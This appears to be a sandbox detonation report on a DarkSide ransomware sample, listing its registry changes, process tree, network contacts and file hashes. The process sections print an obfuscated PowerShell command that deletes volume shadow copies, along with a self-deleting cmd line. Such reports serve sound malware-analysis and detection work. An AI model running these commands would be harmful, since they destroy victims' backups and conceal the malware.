Analysis Overview
SHA256
151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5
Threat Level: Known bad
The file 151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5 was found to be: Known bad.
Malicious Activity Summary
DarkSide
Modifies extensions of user files
Deletes itself
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of WriteProcessMemory
Modifies Control Panel
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-05-18 20:48
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2021-05-18 20:48
Reported
2021-05-18 20:51
Platform
win10v20210410
Max time kernel
137s
Max time network
143s
Command Line
Signatures
DarkSide
Modifies extensions of user files
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\7b336f65.BMP" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\7b336f65.BMP" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Enumerates physical storage devices
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.7b336f65 | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.7b336f65\ = "7b336f65" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65 | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\7b336f65.ico" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3872 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3872 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3872 wrote to memory of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3872 wrote to memory of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3872 wrote to memory of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe
"C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\151FBD~1.EXE >> NUL
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | securebestapp20.com | udp |
| N/A | 185.105.109.19:443 | securebestapp20.com | tcp |
| N/A | 8.8.8.8:53 | 23.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 13.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 22.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 20.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 18.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 16.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 15.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.18:5355 | udp | |
| N/A | 10.10.0.23:5355 | udp | |
| N/A | 8.8.8.8:53 | 14.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.20:5355 | udp | |
| N/A | 10.10.0.22:5355 | udp | |
| N/A | 8.8.8.8:53 | 12.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.14:5355 | udp | |
| N/A | 8.8.8.8:53 | 40.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 41.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.15:5355 | udp | |
| N/A | 10.10.0.12:5355 | udp | |
| N/A | 8.8.8.8:53 | 1.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.13:5355 | udp | |
| N/A | 10.10.0.16:5355 | udp | |
| N/A | 8.8.8.8:53 | 29.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 31.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.41:5355 | udp | |
| N/A | 8.8.8.8:53 | 32.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.40:5355 | udp | |
| N/A | 10.10.0.29:5355 | udp | |
| N/A | 8.8.8.8:53 | 35.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.31:5355 | udp | |
| N/A | 10.10.0.32:5355 | udp | |
| N/A | 185.105.109.19:443 | securebestapp20.com | tcp |
Files
memory/2152-114-0x0000000000000000-mapping.dmp
memory/2152-120-0x00000188ED380000-0x00000188ED381000-memory.dmp
memory/2152-125-0x00000188ED530000-0x00000188ED531000-memory.dmp
memory/2152-131-0x00000188E9633000-0x00000188E9635000-memory.dmp
memory/2152-130-0x00000188E9630000-0x00000188E9632000-memory.dmp
memory/2152-132-0x00000188E9636000-0x00000188E9638000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ea6243fdb2bfcca2211884b0a21a0afc |
| SHA1 | 2eee5232ca6acc33c3e7de03900e890f4adf0f2f |
| SHA256 | 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8 |
| SHA512 | 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0c2d3bf4ba8eb3735234f262ae3bddc5 |
| SHA1 | 997f7a1adf15a0c0982a5a37f0c83129b655c51d |
| SHA256 | e6548f346089f0597561abe61ebfd2d7a218ff647478c75896a009ec44d606c1 |
| SHA512 | 032a645383358790fbfd0c95767f22a1a027a291298ac51d6d9d404c3e3a40f4fede9aff92f7e9a71e28831a6ecb278be04130c893f20ef17ea016dd967337f0 |
memory/4816-144-0x0000000000000000-mapping.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2021-05-18 20:48
Reported
2021-05-18 20:51
Platform
win7v20210410
Max time kernel
74s
Max time network
65s
Command Line
Signatures
DarkSide
Modifies extensions of user files
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Enumerates physical storage devices
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443 | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443 | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe
"C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\151FBD~1.EXE >> NUL
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | securebestapp20.com | udp |
| N/A | 185.105.109.19:443 | securebestapp20.com | tcp |
| N/A | 8.8.8.8:53 | 16.0.7.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 33.0.7.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 25.0.7.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 14.0.7.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 27.0.7.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 1.0.7.10.in-addr.arpa | udp |
| N/A | 10.7.0.16:5355 | udp | |
| N/A | 10.7.0.14:5355 | udp | |
| N/A | 8.8.8.8:53 | 18.0.7.10.in-addr.arpa | udp |
| N/A | 10.7.0.33:5355 | udp | |
| N/A | 8.8.8.8:53 | 31.0.7.10.in-addr.arpa | udp |
| N/A | 10.7.0.18:5355 | udp | |
| N/A | 8.8.8.8:53 | 23.0.7.10.in-addr.arpa | udp |
| N/A | 10.7.0.27:5355 | udp | |
| N/A | 8.8.8.8:53 | 10.0.7.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 15.0.7.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 28.0.7.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 20.0.7.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 13.0.7.10.in-addr.arpa | udp |
| N/A | 10.7.0.31:5355 | udp | |
| N/A | 10.7.0.20:5355 | udp | |
| N/A | 10.7.0.28:5355 | udp | |
| N/A | 10.7.0.13:5355 | udp | |
| N/A | 10.7.0.23:5355 | udp | |
| N/A | 10.7.0.15:5355 | udp | |
| N/A | 10.7.0.25:5355 | udp | |
| N/A | 10.7.0.10:5355 | udp | |
| N/A | 185.105.109.19:443 | securebestapp20.com | tcp |
Files
memory/2040-60-0x0000000076281000-0x0000000076283000-memory.dmp
memory/888-61-0x0000000000000000-mapping.dmp
memory/888-62-0x000007FEFC141000-0x000007FEFC143000-memory.dmp
memory/888-63-0x0000000002520000-0x0000000002521000-memory.dmp
memory/888-64-0x000000001AAC0000-0x000000001AAC1000-memory.dmp
memory/888-65-0x0000000002560000-0x0000000002561000-memory.dmp
memory/888-66-0x0000000002370000-0x0000000002371000-memory.dmp
memory/888-67-0x000000001AA40000-0x000000001AA42000-memory.dmp
memory/888-68-0x000000001AA44000-0x000000001AA46000-memory.dmp
memory/888-69-0x000000001C5A0000-0x000000001C5A1000-memory.dmp
memory/888-70-0x000000001B4D0000-0x000000001B4D1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 13ad95ada4f65a17d044d047d9fd1570 |
| SHA1 | 3cab7b08dd95a2123ec628a2eb60cdc41472dd51 |
| SHA256 | 1e3f7b2b9f5b3f03030a51a17b9a9e68fd309fec3221fa901ccbc391bf51d582 |
| SHA512 | 936db0759eaed1c1e41147a85c3f772a7575f65c3eb02ddadc609a4bacd86b99112bf88e56c4105ce38f1ab36874812e3edaa5b1a36a910196b3b6dc0aeb7c47 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 0b176047694f22b25552fa6739bce32e |
| SHA1 | 03ff70b639bccc339714fe265e5b801d0733497d |
| SHA256 | 82ff29a428d59a1dd9902d782998cd2fa776b196a782c1196b0b9dbcb595b3eb |
| SHA512 | c32f341f40abe5be1d6577e4a6cb1bee1da16d4c3b9272203a76777394809e77888d3392757e827780303dfd63678258186756d2320eac63ce1d37d44aa6abad |
memory/2844-73-0x0000000000000000-mapping.dmp